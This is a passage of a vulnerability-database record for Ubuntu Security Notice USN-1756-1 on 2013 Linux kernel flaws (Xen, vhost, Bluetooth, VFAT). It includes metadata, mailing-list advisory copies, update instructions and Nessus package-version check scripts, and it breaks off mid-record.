ID USN-1756-1 Type ubuntu Reporter Ubuntu Modified 2013-03-06T00:00:00
Description
A failure to validate input was discovered in the Linux kernel's Xen
netback (network backend) driver. A user in a guest OS may exploit this
flaw to cause a denial of service to the guest OS and other guest domains.
(CVE-2013-0216)
A memory leak was discovered in the Linux kernel's Xen netback (network
backend) driver. A user in a guest OS could trigger this flaw to cause a
denial of service on the system. (CVE-2013-0217)
Andrew Jones discovered a flaw with the xen_iret function in Linux kernel's
Xen virtualizeation. In the 32-bit Xen paravirt platform an unprivileged
guest OS user could exploit this flaw to cause a denial of service (crash
the system) or gain guest OS privilege. (CVE-2013-0228)
A flaw was reported in the permission checks done by the Linux kernel for
/dev/cpu/*/msr. A local root user with all capabilities dropped could
exploit this flaw to execute code with full root capabilities.
(CVE-2013-0268)
A flaw was discovered in the Linux kernel's vhost driver used to accelerate
guest networking in KVM based virtual machines. A privileged guest user
could exploit this flaw to crash the host system. (CVE-2013-0311)
An information leak was discovered in the Linux kernel's Bluetooth stack
when HIDP (Human Interface Device Protocol) support is enabled. A local
unprivileged user could exploit this flaw to cause an information leak from
the kernel. (CVE-2013-0349)
A flaw was discovered on the Linux kernel's VFAT filesystem driver when a
disk is mounted with the utf8 option (this is the default on Ubuntu). On a
system where disks/images can be auto-mounted or a FAT filesystem is
mounted an unprivileged user can exploit the flaw to gain root privileges.
(CVE-2013-1773)
{"id": "USN-1756-1", "bulletinFamily": "unix", "title": "Linux kernel vulnerabilities", "description": "A failure to validate input was discovered in the Linux kernel's Xen \nnetback (network backend) driver. A user in a guest OS may exploit this \nflaw to cause a denial of service to the guest OS and other guest domains. \n(CVE-2013-0216)\n\nA memory leak was discovered in the Linux kernel's Xen netback (network \nbackend) driver. A user in a guest OS could trigger this flaw to cause a \ndenial of service on the system. (CVE-2013-0217)\n\nAndrew Jones discovered a flaw with the xen_iret function in Linux kernel's \nXen virtualizeation. In the 32-bit Xen paravirt platform an unprivileged \nguest OS user could exploit this flaw to cause a denial of service (crash \nthe system) or gain guest OS privilege. (CVE-2013-0228)\n\nA flaw was reported in the permission checks done by the Linux kernel for \n/dev/cpu/*/msr. A local root user with all capabilities dropped could \nexploit this flaw to execute code with full root capabilities. \n(CVE-2013-0268)\n\nA flaw was discovered in the Linux kernel's vhost driver used to accelerate \nguest networking in KVM based virtual machines. A privileged guest user \ncould exploit this flaw to crash the host system. (CVE-2013-0311)\n\nAn information leak was discovered in the Linux kernel's Bluetooth stack \nwhen HIDP (Human Interface Device Protocol) support is enabled. A local \nunprivileged user could exploit this flaw to cause an information leak from \nthe kernel. (CVE-2013-0349)\n\nA flaw was discovered on the Linux kernel's VFAT filesystem driver when a \ndisk is mounted with the utf8 option (this is the default on Ubuntu). On a \nsystem where disks/images can be auto-mounted or a FAT filesystem is \nmounted an unprivileged user can exploit the flaw to gain root privileges. \n(CVE-2013-1773)", "published": "2013-03-06T00:00:00", "modified": "2013-03-06T00:00:00", "cvss": {"score": 6.5, "vector": "AV:A/AC:H/Au:S/C:C/I:C/A:C"}, "href": "https://ubuntu.com/security/notices/USN-1756-1", "reporter": "Ubuntu", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2013-0217", "https://people.canonical.com/~ubuntu-security/cve/CVE-2013-0228", "https://people.canonical.com/~ubuntu-security/cve/CVE-2013-0216", "https://people.canonical.com/~ubuntu-security/cve/CVE-2013-1773", "https://people.canonical.com/~ubuntu-security/cve/CVE-2013-0268", "https://people.canonical.com/~ubuntu-security/cve/CVE-2013-0311", "https://people.canonical.com/~ubuntu-security/cve/CVE-2013-0349"], "cvelist": ["CVE-2013-0228", "CVE-2013-0268", "CVE-2013-0217", "CVE-2013-0349", "CVE-2013-0311", "CVE-2013-1773", "CVE-2013-0216"], "type": "ubuntu", "lastseen": "2020-07-09T00:35:23", "edition": 5, "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:29169", "SECURITYVULNS:DOC:29187", "SECURITYVULNS:VULN:12943"]}, {"type": "nessus", "idList": ["UBUNTU_USN-1756-1.NASL", "UBUNTU_USN-1768-1.NASL", "UBUNTU_USN-1760-1.NASL", "SL_20130312_KERNEL_ON_SL6_X.NASL", "REDHAT-RHSA-2013-0630.NASL", "UBUNTU_USN-1767-1.NASL", "CENTOS_RHSA-2013-0630.NASL", "UBUNTU_USN-1776-1.NASL", "ORACLELINUX_ELSA-2013-0630.NASL", "UBUNTU_USN-1769-1.NASL"]}, {"type": "ubuntu", "idList": ["USN-1769-1", "USN-1767-1", "USN-1781-1", "USN-1778-1", "USN-1768-1", "USN-1774-1", "USN-1776-1", "USN-1775-1", "USN-1760-1"]}, {"type": "openvas", "idList": ["OPENVAS:841359", "OPENVAS:1361412562310841359", "OPENVAS:841374", "OPENVAS:841363", "OPENVAS:1361412562310841376", "OPENVAS:841376", "OPENVAS:1361412562310841351", "OPENVAS:1361412562310841374", "OPENVAS:1361412562310841363", "OPENVAS:841351"]}, {"type": "cve", "idList": ["CVE-2013-0349", "CVE-2013-0216", "CVE-2013-0217", "CVE-2013-0311", "CVE-2013-0268", "CVE-2013-0228", "CVE-2013-1773"]}, {"type": "f5", "idList": ["SOL15732"]}, {"type": "seebug", "idList": ["SSV:60670"]}, {"type": "centos", "idList": ["CESA-2013:0630"]}, {"type": "redhat", "idList": ["RHSA-2013:0630", "RHSA-2013:0928"]}, {"type": "xen", "idList": ["XSA-42", "XSA-39"]}, {"type": "oraclelinux", "idList": ["ELSA-2013-0621", "ELSA-2013-2511", "ELSA-2013-2503", "ELSA-2013-2513", "ELSA-2013-2507", "ELSA-2013-2512", "ELSA-2013-0630"]}, {"type": "exploitdb", "idList": ["EDB-ID:23248", "EDB-ID:27297"]}, {"type": "suse", "idList": ["SUSE-SU-2013:0674-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:122678"]}, {"type": "zdt", "idList": ["1337DAY-ID-21073", "1337DAY-ID-21051"]}], "modified": "2020-07-09T00:35:23", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2020-07-09T00:35:23", "rev": 2}, "vulnersScore": 7.5}, "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "11.10", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.0.0-32-powerpc64-smp", "packageVersion": "3.0.0-32.50"}, {"OS": "Ubuntu", "OSVersion": "11.10", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.0.0-32-virtual", "packageVersion": "3.0.0-32.50"}, {"OS": "Ubuntu", "OSVersion": "11.10", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.0.0-32-generic", "packageVersion": "3.0.0-32.50"}, {"OS": "Ubuntu", "OSVersion": "11.10", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.0.0-32-server", "packageVersion": "3.0.0-32.50"}, {"OS": "Ubuntu", "OSVersion": "11.10", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.0.0-32-generic-pae", "packageVersion": "3.0.0-32.50"}, {"OS": "Ubuntu", "OSVersion": "11.10", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.0.0-32-powerpc", "packageVersion": "3.0.0-32.50"}, {"OS": "Ubuntu", "OSVersion": "11.10", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.0.0-32-omap", "packageVersion": "3.0.0-32.50"}, {"OS": "Ubuntu", "OSVersion": "11.10", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.0.0-32-powerpc-smp", "packageVersion": "3.0.0-32.50"}], "scheme": null}
{"securityvulns": [{"lastseen": "2018-08-31T11:10:47", "bulletinFamily": "software", "cvelist": ["CVE-2013-0228", "CVE-2013-0268", "CVE-2013-0217", "CVE-2013-0349", "CVE-2013-0311", "CVE-2013-1773", "CVE-2013-0216"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-1756-1\r\nMarch 06, 2013\r\n\r\nlinux vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 11.10\r\n\r\nSummary:\r\n\r\nSeveral security issues were fixed in the kernel.\r\n\r\nSoftware Description:\r\n- linux: Linux kernel\r\n\r\nDetails:\r\n\r\nA failure to validate input was discovered in the Linux kernel's Xen\r\nnetback (network backend) driver. A user in a guest OS may exploit this\r\nflaw to cause a denial of service to the guest OS and other guest domains.\r\n(CVE-2013-0216)\r\n\r\nA memory leak was discovered in the Linux kernel's Xen netback (network\r\nbackend) driver. A user in a guest OS could trigger this flaw to cause a\r\ndenial of service on the system. (CVE-2013-0217)\r\n\r\nAndrew Jones discovered a flaw with the xen_iret function in Linux kernel's\r\nXen virtualizeation. In the 32-bit Xen paravirt platform an unprivileged\r\nguest OS user could exploit this flaw to cause a denial of service (crash\r\nthe system) or gain guest OS privilege. (CVE-2013-0228)\r\n\r\nA flaw was reported in the permission checks done by the Linux kernel for\r\n/dev/cpu/*/msr. A local root user with all capabilities dropped could\r\nexploit this flaw to execute code with full root capabilities.\r\n(CVE-2013-0268)\r\n\r\nA flaw was discovered in the Linux kernel's vhost driver used to accelerate\r\nguest networking in KVM based virtual machines. A privileged guest user\r\ncould exploit this flaw to crash the host system. (CVE-2013-0311)\r\n\r\nAn information leak was discovered in the Linux kernel's Bluetooth stack\r\nwhen HIDP (Human Interface Device Protocol) support is enabled. A local\r\nunprivileged user could exploit this flaw to cause an information leak from\r\nthe kernel. (CVE-2013-0349)\r\n\r\nA flaw was discovered on the Linux kernel's VFAT filesystem driver when a\r\ndisk is mounted with the utf8 option (this is the default on Ubuntu). On a\r\nsystem where disks/images can be auto-mounted or a FAT filesystem is\r\nmounted an unprivileged user can exploit the flaw to gain root privileges.\r\n(CVE-2013-1773)\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 11.10:\r\n linux-image-3.0.0-32-generic 3.0.0-32.50\r\n linux-image-3.0.0-32-generic-pae 3.0.0-32.50\r\n linux-image-3.0.0-32-omap 3.0.0-32.50\r\n linux-image-3.0.0-32-powerpc 3.0.0-32.50\r\n linux-image-3.0.0-32-powerpc-smp 3.0.0-32.50\r\n linux-image-3.0.0-32-powerpc64-smp 3.0.0-32.50\r\n linux-image-3.0.0-32-server 3.0.0-32.50\r\n linux-image-3.0.0-32-virtual 3.0.0-32.50\r\n\r\nAfter a standard system update you need to reboot your computer to make\r\nall the necessary changes.\r\n\r\nATTENTION: Due to an unavoidable ABI change the kernel updates have\r\nbeen given a new version number, which requires you to recompile and\r\nreinstall all third party kernel modules you might have installed. If\r\nyou use linux-restricted-modules, you have to update that package as\r\nwell to get modules which work with the new kernel version. Unless you\r\nmanually uninstalled the standard kernel metapackages (e.g. linux-generic,\r\nlinux-server, linux-powerpc), a standard system upgrade will automatically\r\nperform this as well.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-1756-1\r\n CVE-2013-0216, CVE-2013-0217, CVE-2013-0228, CVE-2013-0268,\r\n CVE-2013-0311, CVE-2013-0349, CVE-2013-1773\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/linux/3.0.0-32.50\r\n\r\n\r\nAttached Message Part\r\n\r\n\r\n\r\n-- ubuntu-security-announce mailing list ubuntu-security-announce@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n", "edition": 1, "modified": "2013-03-11T00:00:00", "published": "2013-03-11T00:00:00", "id": "SECURITYVULNS:DOC:29169", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29169", "title": "[USN-1756-1] Linux kernel vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.5, "vector": "AV:ADJACENT_NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:50", "bulletinFamily": "software", "cvelist": ["CVE-2013-0228", "CVE-2013-0190", "CVE-2013-0268", "CVE-2013-0217", "CVE-2013-0349", "CVE-2013-1774", "CVE-2013-0311", "CVE-2013-0231", "CVE-2013-0313", "CVE-2013-1773", "CVE-2013-0216", "CVE-2013-1796"], "description": "DoS, privilege escalation, information leakage.", "edition": 1, "modified": "2013-03-19T00:00:00", "published": "2013-03-19T00:00:00", "id": "SECURITYVULNS:VULN:12943", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12943", "title": "Linux kernel multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:ADJACENT_NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:47", "bulletinFamily": "software", "cvelist": ["CVE-2013-0228", "CVE-2013-0190", "CVE-2013-0268", "CVE-2013-0217", "CVE-2013-0349", "CVE-2013-1774", "CVE-2013-0311", "CVE-2013-0231", "CVE-2013-0313", "CVE-2013-0216"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-1767-1\r\nMarch 18, 2013\r\n\r\nlinux vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nSeveral security issues were fixed in the kernel.\r\n\r\nSoftware Description:\r\n- linux: Linux kernel\r\n\r\nDetails:\r\n\r\nAndrew Cooper of Citrix reported a Xen stack corruption in the Linux\r\nkernel. An unprivileged user in a 32bit PVOPS guest can cause the guest\r\nkernel to crash, or operate erroneously. (CVE-2013-0190)\r\n\r\nA failure to validate input was discovered in the Linux kernel's Xen\r\nnetback (network backend) driver. A user in a guest OS may exploit this\r\nflaw to cause a denial of service to the guest OS and other guest domains.\r\n(CVE-2013-0216)\r\n\r\nA memory leak was discovered in the Linux kernel's Xen netback (network\r\nbackend) driver. A user in a guest OS could trigger this flaw to cause a\r\ndenial of service on the system. (CVE-2013-0217)\r\n\r\nAndrew Jones discovered a flaw with the xen_iret function in Linux kernel's\r\nXen virtualizeation. In the 32-bit Xen paravirt platform an unprivileged\r\nguest OS user could exploit this flaw to cause a denial of service (crash\r\nthe system) or gain guest OS privilege. (CVE-2013-0228)\r\n\r\nA flaw was discovered in the Linux kernel Xen PCI backend driver. If a PCI\r\ndevice is assigned to the guest OS, the guest OS could exploit this flaw to\r\ncause a denial of service on the host. (CVE-2013-0231)\r\n\r\nA flaw was reported in the permission checks done by the Linux kernel for\r\n/dev/cpu/*/msr. A local root user with all capabilities dropped could\r\nexploit this flaw to execute code with full root capabilities.\r\n(CVE-2013-0268)\r\n\r\nA flaw was discovered in the Linux kernel's vhost driver used to accelerate\r\nguest networking in KVM based virtual machines. A privileged guest user\r\ncould exploit this flaw to crash the host system. (CVE-2013-0311)\r\n\r\nA flaw was discovered in the Extended Verification Module (EVM) of the\r\nLinux kernel. An unprivileged local user code exploit this flaw to cause a\r\ndenial of service (system crash). (CVE-2013-0313)\r\n\r\nAn information leak was discovered in the Linux kernel's Bluetooth stack\r\nwhen HIDP (Human Interface Device Protocol) support is enabled. A local\r\nunprivileged user could exploit this flaw to cause an information leak from\r\nthe kernel. (CVE-2013-0349)\r\n\r\nA flaw was discovered in the Edgeort USB serial converter driver when the\r\ndevice is disconnected while it is in use. A local user could exploit this\r\nflaw to cause a denial of service (system crash). (CVE-2013-1774)\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 12.04 LTS:\r\n linux-image-3.2.0-39-generic 3.2.0-39.62\r\n linux-image-3.2.0-39-generic-pae 3.2.0-39.62\r\n linux-image-3.2.0-39-highbank 3.2.0-39.62\r\n linux-image-3.2.0-39-omap 3.2.0-39.62\r\n linux-image-3.2.0-39-powerpc-smp 3.2.0-39.62\r\n linux-image-3.2.0-39-powerpc64-smp 3.2.0-39.62\r\n linux-image-3.2.0-39-virtual 3.2.0-39.62\r\n\r\nAfter a standard system update you need to reboot your computer to make\r\nall the necessary changes.\r\n\r\nATTENTION: Due to an unavoidable ABI change the kernel updates have\r\nbeen given a new version number, which requires you to recompile and\r\nreinstall all third party kernel modules you might have installed. If\r\nyou use linux-restricted-modules, you have to update that package as\r\nwell to get modules which work with the new kernel version. Unless you\r\nmanually uninstalled the standard kernel metapackages (e.g. linux-generic,\r\nlinux-server, linux-powerpc), a standard system upgrade will automatically\r\nperform this as well.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-1767-1\r\n CVE-2013-0190, CVE-2013-0216, CVE-2013-0217, CVE-2013-0228,\r\n CVE-2013-0231, CVE-2013-0268, CVE-2013-0311, CVE-2013-0313,\r\n CVE-2013-0349, CVE-2013-1774\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/linux/3.2.0-39.62\r\n\r\n\r\nAttached Message Part\r\n\r\n\r\n\r\n-- ubuntu-security-announce mailing list ubuntu-security-announce@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n", "edition": 1, "modified": "2013-03-19T00:00:00", "published": "2013-03-19T00:00:00", "id": "SECURITYVULNS:DOC:29187", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29187", "title": "[USN-1767-1] Linux kernel vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.5, "vector": "AV:ADJACENT_NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-01-01T06:39:18", "description": "A failure to validate input was discovered in the Linux kernel's Xen\nnetback (network backend) driver. A user in a guest OS may exploit\nthis flaw to cause a denial of service to the guest OS and other guest\ndomains. (CVE-2013-0216)\n\nA memory leak was discovered in the Linux kernel's Xen netback\n(network backend) driver. A user in a guest OS could trigger this flaw\nto cause a denial of service on the system. (CVE-2013-0217)\n\nAndrew Jones discovered a flaw with the xen_iret function in Linux\nkernel's Xen virtualizeation. In the 32-bit Xen paravirt platform an\nunprivileged guest OS user could exploit this flaw to cause a denial\nof service (crash the system) or gain guest OS privilege.\n(CVE-2013-0228)\n\nA flaw was reported in the permission checks done by the Linux kernel\nfor /dev/cpu/*/msr. A local root user with all capabilities dropped\ncould exploit this flaw to execute code with full root capabilities.\n(CVE-2013-0268)\n\nA flaw was discovered in the Linux kernel's vhost driver used to\naccelerate guest networking in KVM based virtual machines. A\nprivileged guest user could exploit this flaw to crash the host\nsystem. (CVE-2013-0311)\n\nAn information leak was discovered in the Linux kernel's Bluetooth\nstack when HIDP (Human Interface Device Protocol) support is enabled.\nA local unprivileged user could exploit this flaw to cause an\ninformation leak from the kernel. (CVE-2013-0349)\n\nA flaw was discovered on the Linux kernel's VFAT filesystem driver\nwhen a disk is mounted with the utf8 option (this is the default on\nUbuntu). On a system where disks/images can be auto-mounted or a FAT\nfilesystem is mounted an unprivileged user can exploit the flaw to\ngain root privileges. (CVE-2013-1773).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2013-03-13T00:00:00", "title": "Ubuntu 10.04 LTS : linux-lts-backport-oneiric vulnerabilities (USN-1760-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0228", "CVE-2013-0268", "CVE-2013-0217", "CVE-2013-0349", "CVE-2013-0311", "CVE-2013-1773", "CVE-2013-0216"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.0-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.0-virtual", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.0-generic-pae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.0-server"], "id": "UBUNTU_USN-1760-1.NASL", "href": "https://www.tenable.com/plugins/nessus/65252", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1760-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(65252);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/09/19 12:54:29\");\n\n script_cve_id(\"CVE-2013-0216\", \"CVE-2013-0217\", \"CVE-2013-0228\", \"CVE-2013-0268\", \"CVE-2013-0311\", \"CVE-2013-0349\", \"CVE-2013-1773\");\n script_bugtraq_id(57743, 57744, 57838, 57940, 58053, 58112, 58200);\n script_xref(name:\"USN\", value:\"1760-1\");\n\n script_name(english:\"Ubuntu 10.04 LTS : linux-lts-backport-oneiric vulnerabilities (USN-1760-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A failure to validate input was discovered in the Linux kernel's Xen\nnetback (network backend) driver. A user in a guest OS may exploit\nthis flaw to cause a denial of service to the guest OS and other guest\ndomains. (CVE-2013-0216)\n\nA memory leak was discovered in the Linux kernel's Xen netback\n(network backend) driver. A user in a guest OS could trigger this flaw\nto cause a denial of service on the system. (CVE-2013-0217)\n\nAndrew Jones discovered a flaw with the xen_iret function in Linux\nkernel's Xen virtualizeation. In the 32-bit Xen paravirt platform an\nunprivileged guest OS user could exploit this flaw to cause a denial\nof service (crash the system) or gain guest OS privilege.\n(CVE-2013-0228)\n\nA flaw was reported in the permission checks done by the Linux kernel\nfor /dev/cpu/*/msr. A local root user with all capabilities dropped\ncould exploit this flaw to execute code with full root capabilities.\n(CVE-2013-0268)\n\nA flaw was discovered in the Linux kernel's vhost driver used to\naccelerate guest networking in KVM based virtual machines. A\nprivileged guest user could exploit this flaw to crash the host\nsystem. (CVE-2013-0311)\n\nAn information leak was discovered in the Linux kernel's Bluetooth\nstack when HIDP (Human Interface Device Protocol) support is enabled.\nA local unprivileged user could exploit this flaw to cause an\ninformation leak from the kernel. (CVE-2013-0349)\n\nA flaw was discovered on the Linux kernel's VFAT filesystem driver\nwhen a disk is mounted with the utf8 option (this is the default on\nUbuntu). On a system where disks/images can be auto-mounted or a FAT\nfilesystem is mounted an unprivileged user can exploit the flaw to\ngain root privileges. (CVE-2013-1773).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1760-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:H/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.0-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.0-generic-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.0-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.0-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2013-2019 Canonical, Inc. / NASL script (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(10\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 10.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2013-0216\", \"CVE-2013-0217\", \"CVE-2013-0228\", \"CVE-2013-0268\", \"CVE-2013-0311\", \"CVE-2013-0349\", \"CVE-2013-1773\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-1760-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-3.0.0-32-generic\", pkgver:\"3.0.0-32.50~lucid1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-3.0.0-32-generic-pae\", pkgver:\"3.0.0-32.50~lucid1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-3.0.0-32-server\", pkgver:\"3.0.0-32.50~lucid1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-3.0.0-32-virtual\", pkgver:\"3.0.0-32.50~lucid1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.0-generic / linux-image-3.0-generic-pae / etc\");\n}\n", "cvss": {"score": 6.5, "vector": "AV:A/AC:H/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T06:39:18", "description": "A failure to validate input was discovered in the Linux kernel's Xen\nnetback (network backend) driver. A user in a guest OS may exploit\nthis flaw to cause a denial of service to the guest OS and other guest\ndomains. (CVE-2013-0216)\n\nA memory leak was discovered in the Linux kernel's Xen netback\n(network backend) driver. A user in a guest OS could trigger this flaw\nto cause a denial of service on the system. (CVE-2013-0217)\n\nAndrew Jones discovered a flaw with the xen_iret function in Linux\nkernel's Xen virtualizeation. In the 32-bit Xen paravirt platform an\nunprivileged guest OS user could exploit this flaw to cause a denial\nof service (crash the system) or gain guest OS privilege.\n(CVE-2013-0228)\n\nA flaw was reported in the permission checks done by the Linux kernel\nfor /dev/cpu/*/msr. A local root user with all capabilities dropped\ncould exploit this flaw to execute code with full root capabilities.\n(CVE-2013-0268)\n\nA flaw was discovered in the Linux kernel's vhost driver used to\naccelerate guest networking in KVM based virtual machines. A\nprivileged guest user could exploit this flaw to crash the host\nsystem. (CVE-2013-0311)\n\nAn information leak was discovered in the Linux kernel's Bluetooth\nstack when HIDP (Human Interface Device Protocol) support is enabled.\nA local unprivileged user could exploit this flaw to cause an\ninformation leak from the kernel. (CVE-2013-0349)\n\nA flaw was discovered on the Linux kernel's VFAT filesystem driver\nwhen a disk is mounted with the utf8 option (this is the default on\nUbuntu). On a system where disks/images can be auto-mounted or a FAT\nfilesystem is mounted an unprivileged user can exploit the flaw to\ngain root privileges. (CVE-2013-1773).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "published": "2013-03-07T00:00:00", "title": "Ubuntu 11.10 : linux vulnerabilities (USN-1756-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0228", "CVE-2013-0268", "CVE-2013-0217", "CVE-2013-0349", "CVE-2013-0311", "CVE-2013-1773", "CVE-2013-0216"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:11.10", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.0-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.0-virtual", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.0-generic-pae", 